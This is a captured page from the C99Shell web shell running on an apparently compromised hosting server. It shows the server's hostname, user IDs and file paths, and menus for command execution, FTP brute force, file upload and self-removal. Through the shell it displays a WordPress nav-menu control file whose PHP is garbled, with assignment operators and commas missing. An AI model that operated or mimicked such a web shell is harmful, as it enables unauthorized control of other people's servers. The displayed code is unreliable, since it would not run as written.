!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-includes/customize/   drwxr-xr-x
Free 182.34 GB of 490.84 GB (37.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class-wp-customize-nav-menu-control.php (2.87 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Customize API: WP_Customize_Nav_Menu_Control class
 *
 * @package WordPress
 * @subpackage Customize
 * @since 4.4.0
 */

/**
 * Customize Nav Menu Control Class.
 *
 * @since 4.3.0
 */
class WP_Customize_Nav_Menu_Control extends WP_Customize_Control {

    
/**
     * Control type.
     *
     * @since 4.3.0
     * @access public
     * @var string
     */
    
public $type 'nav_menu';

    
/**
     * The nav menu setting.
     *
     * @since 4.3.0
     * @access public
     * @var WP_Customize_Nav_Menu_Setting
     */
    
public $setting;

    
/**
     * Don't render the control's content - it uses a JS template instead.
     *
     * @since 4.3.0
     * @access public
     */
    
public function render_content() {}

    
/**
     * JS/Underscore template for the control UI.
     *
     * @since 4.3.0
     * @access public
     */
    
public function content_template() {
        
?>
        <button type="button" class="button add-new-menu-item" aria-label="<?php esc_attr_e'Add or remove menu items' ); ?>" aria-expanded="false" aria-controls="available-menu-items">
            <?php _e'Add Items' ); ?>
        </button>
        <button type="button" class="button-link reorder-toggle" aria-label="<?php esc_attr_e'Reorder menu items' ); ?>" aria-describedby="reorder-items-desc-{{ data.menu_id }}">
            <span class="reorder"><?php _ex'Reorder''Reorder menu items in Customizer' ); ?></span>
            <span class="reorder-done"><?php _ex'Done''Cancel reordering menu items in Customizer' ); ?></span>
        </button>
        <p class="screen-reader-text" id="reorder-items-desc-{{ data.menu_id }}"><?php _e'When in reorder mode, additional controls to reorder menu items will be available in the items list above.' ); ?></p>
        <span class="menu-delete-item">
            <button type="button" class="button-link menu-delete">
                <?php _e'Delete Menu' ); ?>
            </button>
        </span>
        <?php if ( current_theme_supports'menus' ) ) : ?>
        <ul class="menu-settings">
            <li class="customize-control">
                <span class="customize-control-title"><?php _e'Display Location' ); ?></span>
            </li>

            <?php foreach ( get_registered_nav_menus() as $location => $description ) : ?>
            <li class="customize-control customize-control-checkbox assigned-menu-location">
                <label>
                    <input type="checkbox" data-menu-id="{{ data.menu_id }}" data-location-id="<?php echo esc_attr$location ); ?>" class="menu-location" /> <?php echo $description?>
                    <span class="theme-location-set"><?php
                        
/* translators: %s: menu name */
                        
printf_x'(Current: %s)''menu location' ),
                            
'<span class="current-menu-location-name-' esc_attr$location ) . '"></span>'
                        
);
                    
?></span>
                </label>
            </li>
            <?php endforeach; ?>

        </ul>
        <?php endif;
    }

    
/**
     * Return parameters for this control.
     *
     * @since 4.3.0
     * @access public
     *
     * @return array Exported parameters.
     */
    
public function json() {
        
$exported            parent::json();
        
$exported['menu_id'] = $this->setting->term_id;

        return 
$exported;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0257 ]--